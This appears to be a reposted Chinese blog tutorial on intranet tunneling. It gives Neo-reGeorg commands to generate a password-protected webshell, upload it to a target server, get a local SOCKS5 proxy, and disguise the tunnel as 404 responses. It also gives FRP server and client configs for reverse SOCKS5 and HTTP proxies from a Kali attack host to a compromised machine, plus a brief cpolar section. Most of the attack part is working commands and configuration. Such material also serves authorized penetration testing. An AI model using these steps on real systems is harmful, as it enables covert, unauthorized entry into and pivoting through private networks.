内网穿透

Posted lisenMiller

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了内网穿透相关的知识,希望对你有一定的参考价值。

NEO-regeorg隐蔽隧道搭建

由python写的一个http代理工具

基本使用

1.设置一个连接密码

python .\\neoreg.py generate -k 连接密码 -o 指定输出目录

例如
python .\\neoreg.py generate -k passwd

2.再将生成出来的木马文件上传到目标服务器上

3.连接目标 脚本会自动生成一个sockets5的代理映射在本地的1080端口以上供我们使用。

使用sockets5:127.0.0.1:1080即可

python .\\neoreg.py -k passwd -u 目标地址

例如
python .\\neoreg.py -k passwd -u http://www.tst.com/tunnel.php

#连接的时候发现error 可以使用--skip进行略过开启
python .\\neoreg.py -k pass -u http://www.test.com/tunnel.php --skip
关键是有没有包含requests包
pip3 install requests

4.一般来说都是通过200的页面去链接,neoreg可以伪造404页面进行连接

python .\\neoreg.py -k passwd  --file 404.html --httpcode 404 -o test2

 FRP隧道连接

https://github.com/fatedier/frp/releases

1.socks5反向代理

配置服务端
[common]
bind_addr=0.0.0.0
bind_port=1234
[socks5]
type=tcp
remote_port=1080
plugin=socks5

配置客户端
[common]
server_addr=kali\'s ip
server_port=1234
[socks5]
type=tcp
remote_port=1080
plugin=socks5

proxychains添加socks5代理

2.HTTP的反向代理

配置服务端,将frps以及frps.ini上传到攻击机如下
[common]
bind_addr=0.0.0.0    #frp配置监听ip
bind_port=1234       #frp配置监听端口
[http_proxy]
type=tcp        
remote_port=1080   #http代理端口
plugin=http_proxy  #使用http代理

配置客户端,将frpc和frpc.ini上传到靶机
[common]
server_addr=kali\'s ip
server_port=1234
[http_proxy]
type=tcp
remote_port=1080
plugin=http_proxy

#利用
frps -c frps.ini
frpc -c frpc.ini

#再添加http代理端口1080

 

使用cpolar实现内网穿透

参考技术A 登录到cpolar后台,获取到自己的token值,然后复制到命令中,替换xxxxxxxx

配置文件会保存在/root/.cpolar/cpolar.yml,记录下该路径

编辑成如下内容:

注:这里的配置文件是yaml格式,每一级的参数前面,会缩进两个空格,不能使用TAB键

https://dashboard.cpolar.com/status

以上是关于内网穿透的主要内容,如果未能解决你的问题,请参考以下文章

钉钉内网穿透设置方法

cpolar——安全的内网穿透工具

FRP内网穿透工具

使用cpolar实现内网穿透

Golang gRPC实现内网穿透

有没有简单的内网穿透工具?